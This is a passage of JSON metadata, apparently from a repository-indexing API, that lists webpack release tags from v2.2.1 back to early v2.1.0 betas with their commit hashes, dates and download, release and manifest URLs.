nd":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","ki